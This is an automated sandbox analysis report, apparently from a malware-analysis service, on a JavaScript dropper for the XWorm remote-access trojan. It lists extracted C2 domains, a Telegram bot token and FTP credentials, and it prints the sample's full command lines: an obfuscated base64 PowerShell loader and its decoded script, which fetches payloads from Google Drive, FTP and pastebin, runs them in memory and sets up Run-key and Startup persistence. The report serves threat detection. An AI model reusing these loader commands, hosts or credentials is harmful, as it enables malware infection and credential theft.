Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20-09-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
MOT-DE-PASSE.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
MOT-DE-PASSE.js
Resource
win10v2004-20240802-en
General
-
Target
MOT-DE-PASSE.js
-
Size
24KB
-
MD5
3568415c8644c0e6a231927bb26c3307
-
SHA1
3cdece2baabd90c46b4b10d8fc14dfbbc7352651
-
SHA256
914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622
-
SHA512
465238863185d29bede8da70f823d1ac78874768962a726b1262f65411547cd9d2502d78ea5633642b2a26cbeb754ea1c174d4fcf0229d99035fd5c0a98227fe
-
SSDEEP
768:mUj6N48QwfUtVRd64neTcgc0N4DnW2N2Tcc4Hg/0IeSpQYQBcRRuv1mcifM+oQ4a:AfGefZD/MFiZ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
xworm
5.0
moneyluckwork.ddns.net:7000
moneyluck.duckdns.org:7000
gGehVFEiZl8AfiDz
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Extracted
gurcu
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4812-57-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 8 IoCs
flow pid Process 10 4744 powershell.exe 18 4744 powershell.exe 20 4744 powershell.exe 21 4744 powershell.exe 24 4744 powershell.exe 26 4744 powershell.exe 29 4744 powershell.exe 30 1048 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation wscript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_x = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\wpnoa.ps1' \";exit" powershell.exe -
pid Process 4356 powershell.exe 4744 powershell.exe 4080 powershell.exe 1048 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 30 pastebin.com 23 pastebin.com 24 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1048 set thread context of 4812 1048 powershell.exe 93 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4812 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4356 powershell.exe 4356 powershell.exe 4744 powershell.exe 4744 powershell.exe 4744 powershell.exe 4080 powershell.exe 4080 powershell.exe 1048 powershell.exe 1048 powershell.exe 1048 powershell.exe 4812 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 4812 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4812 RegAsm.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1492 wrote to memory of 4356 1492 wscript.exe 82 PID 1492 wrote to memory of 4356 1492 wscript.exe 82 PID 4356 wrote to memory of 4744 4356 powershell.exe 84 PID 4356 wrote to memory of 4744 4356 powershell.exe 84 PID 4744 wrote to memory of 4080 4744 powershell.exe 87 PID 4744 wrote to memory of 4080 4744 powershell.exe 87 PID 4744 wrote to memory of 1048 4744 powershell.exe 91 PID 4744 wrote to memory of 1048 4744 powershell.exe 91 PID 4744 wrote to memory of 3592 4744 powershell.exe 92 PID 4744 wrote to memory of 3592 4744 powershell.exe 92 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93 PID 1048 wrote to memory of 4812 1048 powershell.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA' + [char]66 + 'UAFEATQ' + [char]66 + 'kAEYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAVA' + [char]66 + 'RAE0AZA' + [char]66 + 'GACAAKQAgAHsAJA' + [char]66 + 'NAGkAUg' + [char]66 + 'JAGQAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAKQAgAHsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAKAAkAFIAWQ' + [char]66 + 'FAGEARgAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAFIAWQ' + [char]66 + 'FAGEARgAgAD0AIAAoACQAUg' + [char]66 + 'ZAEUAYQ' + [char]66 + 'GACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAEEAVQ' + [char]66 + 'yAEcARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAA9ACAAKAAgACQATQ' + [char]66 + 'pAFIASQ' + [char]66 + 'kACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAQQ' + [char]66 + 'VAHIARw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAGgAcA' + [char]66 + '4AGUAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGgAcA' + [char]66 + '4AGUALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAnAGYAdA' + [char]66 + 'wADoALwAvAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQAMQ' + [char]66 + 'AAGYAdA' + [char]66 + 'wAC4AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAuAGMAbw' + [char]66 + 'tAC4AYg' + [char]66 + 'yAC8AVQ' + [char]66 + 'wAGMAcg' + [char]66 + '5AHAAdA' + [char]66 + 'lAHIALwAwADIALw' + [char]66 + 'EAEwATAAwADEALg' + [char]66 + '0AHgAdAAnACAAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAGQAaQ' + [char]66 + 'zAHAAbw' + [char]66 + 'zAGUAKAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAgACkAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAHkAcA' + [char]66 + 'lACgAIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnAHAAcg' + [char]66 + 'GAFYASQAnACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcASw' + [char]66 + 'RAGQAVg' + [char]66 + 'jADYARwA2AC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'tAG8AYwAuAG4AaQ' + [char]66 + 'iAGUAdA' + [char]66 + 'zAGEAcAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgACwAIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAsACAAJw' + [char]66 + '0AHIAdQ' + [char]66 + 'lACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;powershell $fLbjh2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$TQMdF = $host.Version.Major.Equals(2);If ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = ( New-Object Net.WebClient ) ;$yHJhx.Encoding = [System.Text.Encoding]::UTF8 ;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$VtaAF = $hpxe.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$hpxe.dispose();$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $hpxe.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4812
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js"4⤵PID:3592
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
232KB
MD5cf594063c738ae07171e6c6edc8a1277
SHA13c47e47bc90a71a4255b72505bb50a84e3c2d712
SHA25684a031eb8b28b80d6ee7ed4e870c6776cb1f12a1dead8c8aa033e9c675fca487
SHA5126f2ea0b7f8f01240ff786bbc3c253d46e2ea0ea0c08657a2357147b17232e4ac5745a0ab8da2d73b7ab03bab89b4f219d74f6654d99e5fbba72b7b2d63080115
-
Filesize
334B
MD568fef3132ed2fe642c26e40cf12a66f7
SHA15797e4790462e87172916c01245c525c5ef89c5d
SHA2563a9f97203fdedc7c5747d62d582e0a057a582acebbf56e099b87642404ad8ecb
SHA512c4fe06b37961706f3503a2d5e120ad46023aa722ecc6778e0b31d979e5b813124fabe5c78858d485adbdfe34225d02f2e3d63fd78389ac7ddc6861380c9bc962
-
Filesize
1KB
MD5387eb7d3f9ac68be25ca2678748aab34
SHA1b7ad87b56f5235279a590f47ddc10b4308d0378c
SHA2569bea7a125ae2b802e05d853bf1dbdbdcc35dba622e90c1e28443d33b327765ee
SHA512d900ae4a4ecd8a70eb278de5af07eb53534816c5fa04195ffdf5f2d4b7f614628fe22402b016cd8621bb3f9da1282d2730873b370aa2402a2b611b29046cd23a
-
Filesize
948B
MD5c1a54dd5a1ab44cc4c4afd42f291c863
SHA1b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82